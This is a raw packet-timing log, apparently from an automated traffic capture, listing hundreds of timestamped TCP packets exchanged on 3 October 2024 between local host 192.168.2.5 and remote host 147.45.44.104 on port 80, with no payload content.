                                                                                                                                Oct 3, 2024 15:07:08.340432882 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340460062 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.390877962 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.424173117 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424201012 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424213886 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424278975 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424293995 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424308062 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424315929 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424334049 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.424401045 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.424750090 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424814939 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.424829006 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424912930 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424926043 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424941063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424956083 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.424962044 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424978971 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.424988985 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.424993038 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425009966 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425021887 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.425048113 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.425497055 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425512075 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425525904 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425568104 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.425569057 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425585032 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425599098 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425611973 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425621986 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.425626040 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425649881 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.425678015 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.425800085 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425853014 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425888062 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425899029 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.425903082 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425925970 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425946951 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425952911 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.425962925 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425977945 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.425988913 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.425992966 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426009893 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426021099 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426026106 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426040888 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426049948 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426065922 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426079988 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426089048 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426099062 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426112890 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426117897 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426130056 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426141977 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426151037 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426171064 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426175117 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426191092 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426198959 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426214933 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426225901 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426233053 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426249981 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426265001 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426266909 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426280022 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426295042 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426296949 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426310062 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426330090 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426356077 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426357031 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426372051 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426394939 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426408052 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426412106 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426423073 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426436901 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426451921 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426482916 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426513910 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426528931 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426542044 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426557064 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426564932 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426572084 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426587105 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426598072 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426624060 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426625013 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426640034 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426661968 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426676035 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426681042 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426691055 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426704884 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426716089 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426719904 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426736116 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426747084 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426779032 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426815033 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426831007 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426843882 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426857948 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426867008 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426872969 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426896095 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426902056 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426912069 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426927090 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426938057 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.426942110 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426959038 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.426968098 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427000999 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427197933 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427212954 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427227020 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427239895 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427253962 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427268982 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427268982 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427287102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427299023 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427323103 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427357912 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427371979 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427395105 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427407026 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427409887 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427424908 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427437067 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427438974 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427459955 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427468061 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427475929 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427489996 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427500963 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427508116 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427529097 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427534103 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427544117 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427560091 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427571058 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427582026 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427596092 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427602053 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427613020 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427627087 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427637100 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427642107 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427656889 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427666903 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427671909 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427686930 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427699089 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427711010 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427723885 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427727938 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427738905 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427759886 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427762985 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427773952 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427789927 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427808046 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427828074 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.427835941 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427850962 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427865028 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.427898884 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.469139099 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520050049 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520066977 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520087957 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520102024 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520116091 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520129919 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520145893 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520148993 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520225048 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520236015 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520241022 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520256042 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520270109 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520275116 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520284891 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520298958 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520304918 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520313978 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520327091 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520334005 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520351887 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520366907 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520375013 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520382881 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520397902 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520405054 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520414114 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520430088 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520436049 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520451069 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520462036 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520464897 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520482063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520494938 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520503044 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520510912 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520524025 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520530939 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520539999 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520553112 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520553112 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520577908 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520577908 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520592928 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520607948 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520616055 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520657063 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520663023 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520678043 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520690918 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520711899 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520720005 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520728111 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520742893 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520754099 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520757914 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520773888 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520785093 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520787001 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520802021 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520816088 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520816088 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520840883 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520845890 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520855904 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520872116 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.520884991 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.520915985 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521297932 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521318913 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521356106 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521378040 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521387100 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521393061 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521409035 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521421909 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521425962 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521451950 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521483898 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521497965 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521512032 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521526098 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521528959 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521542072 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521555901 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521558046 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521589041 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521630049 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521644115 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521657944 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521671057 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521675110 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521687031 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521699905 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521703005 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521716118 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521735907 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521761894 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521774054 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521789074 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521800995 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521821976 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521833897 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521836042 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521851063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521864891 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521868944 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521878958 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521893978 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521895885 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521908998 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521923065 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521924019 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521939039 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521951914 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521953106 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521976948 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.521980047 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.521992922 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522006989 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522021055 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522022009 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522037029 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522047997 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522061110 CEST8049704147.45.44.104192.168.2.5
